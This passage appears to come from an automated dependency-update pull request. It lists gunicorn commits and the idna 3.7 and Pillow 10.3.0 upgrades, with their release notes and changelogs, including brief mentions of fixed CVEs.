href=\"https://github.com/benoitc/gunicorn/commit/3acd9fbfd1159ca3cd80a8052ada89a0bf27f806\"\u003e\u003ccode\u003e3acd9fb\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2620\"\u003e#2620\u003c/a\u003e from talkerbox/improve-access-log-format-docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/3f56d76548e4ade034bf5e174737902970285d1f\"\u003e\u003ccode\u003e3f56d76\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3192\"\u003e#3192\u003c/a\u003e from pajod/patch-allowed-script-name\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/256d474a7910bd605f2cc8c082b79c1ae55215a9\"\u003e\u003ccode\u003e256d474\u003c/code\u003e\u003c/a\u003e docs: revert duped directive\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/ffa48b581dcaa75f17fd2df263515e4266feeef6\"\u003e\u003ccode\u003effa48b5\u003c/code\u003e\u003c/a\u003e test: default change was intentional\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/52538ca9070b5e7ead5d0fa731e82a622dc6f3ee\"\u003e\u003ccode\u003e52538ca\u003c/code\u003e\u003c/a\u003e docs: recommend SCRIPT_NAME=/subfolder\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/benoitc/gunicorn/compare/20.0.4...23.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.10 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.10...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pillow` from 8.2.0 to 10.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/releases\"\u003epillow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\"\u003ehttps://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eDeprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate eval(), replacing it with lambda_eval() and unsafe_eval() \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDeprecate ImageCms constants and versions() function \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7702\"\u003e#7702\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-28219: Use strncpy to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003efunctools.lru_cache\u003c/code\u003e for \u003ccode\u003ehopper()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7912\"\u003e#7912\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImprove speed of loading QOI images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7925\"\u003e#7925\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdd --report argument to \u003cstrong\u003emain\u003c/strong\u003e.py to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16, I;16L and I;16B conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e [\u003ca href=\"https://github.com/Yay295\"\u003e\u003ccode\u003e@​Yay295\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDetermine MPO size from markers, not EXIF data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e [\u003ca href=\"https://github.com/scaramallion\"\u003e\u003ccode\u003e@​scaramallion\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed joined corners for ImageDraw rounded_rectangle() non-integer dimensions \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7881\"\u003e#7881\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemoved Python and NumPy pinning on Cygwin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7880\"\u003e#7880\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUpdate UnidentifiedImageError and \u003cstrong\u003eversion\u003c/strong\u003e imports \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7644\"\u003e#7644\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eStop reading EPS image at EOF marker \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7753\"\u003e#7753\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePSD layer co-ordinates may be negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7706\"\u003e#7706\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse subprocess with CREATE_NO_WINDOW flag in ImageShow WindowsViewer \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7791\"\u003e#7791\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eWhen saving GIF frame that restores to background color, do not fill identical pixels \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7788\"\u003e#7788\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed reading PNG iCCP compression method \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7823\"\u003e#7823\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAllow writing IFDRational to UNDEFINED tag \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7840\"\u003e#7840\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix logged tag name when loading Exif data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7842\"\u003e#7842\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse maximum frame size in IHDR chunk when saving APNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7821\"\u003e#7821\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePrevent opening P TGA images without a palette \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7797\"\u003e#7797\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse palette when loading ICO images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7798\"\u003e#7798\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse consistent arguments for load_read and load_seek \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7713\"\u003e#7713\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eTurn off nullability warnings for macOS SDK \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7827\"\u003e#7827\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix shift-sign issue in Convert.c \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7838\"\u003e#7838\u003c/a\u003e [\u003ca href=\"https://github.com/r-barnes\"\u003e\u003ccode\u003e@​r-barnes\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ewinbuild: Refactor dependency versions into constants \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7843\"\u003e#7843\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eBuild macOS arm64 wheels natively \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7852\"\u003e#7852\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed typo \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7855\"\u003e#7855\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eOpen 16-bit grayscale PNGs as I;16 \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7849\"\u003e#7849\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eHandle truncated chunks at the end of PNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7709\"\u003e#7709\u003c/a\u003e [\u003ca href=\"https://github.com/lajiyuan\"\u003e\u003ccode\u003e@​lajiyuan\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eMatch mask size to pasted image size in GifImagePlugin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7779\"\u003e#7779\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/blob/main/CHANGES.rst\"\u003epillow's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0 (2024-04-01)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eCVE-2024-28219: Use \u003ccode\u003estrncpy\u003c/code\u003e to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e\n[radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDeprecate \u003ccode\u003eeval()\u003c/code\u003e, replacing it with \u003ccode\u003elambda_eval()\u003c/code\u003e and \u003ccode\u003eunsafe_eval()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e\n[radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise \u003ccode\u003eValueError\u003c/code\u003e if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003e--report\u003c/code\u003e argument to \u003ccode\u003e__main__.py\u003c/code\u003e to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e\n[nulano, radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded RGB to I;16, I;16L, I;16B and I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e\n[nulano, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e\n[Yay295, hugovk, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDetermine MPO size from markers, not EXIF data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e\n[scaramallion, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/5c89d88eee199ba53f64581ea39b6a1bc52feb1a\"\u003e\u003ccode\u003e5c89d88\u003c/code\u003e\u003c/a\u003e 10.3.0 version bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/63cbfcfdea2d163ec93bae8d283fcfe4b73b5dc7\"\u003e\u003ccode\u003e63cbfcf\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/2776126aa9af322b416eaca247f4f8ebefd08128\"\u003e\u003ccode\u003e2776126\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e from python-pillow/lcms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/aeb51cbb169eb3285818ba1390ddf2771d897e6e\"\u003e\u003ccode\u003eaeb51cb\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into lcms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/5beb0b66648db8b542bb5260eed79b25e33d643b\"\u003e\u003ccode\u003e5beb0b6\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca 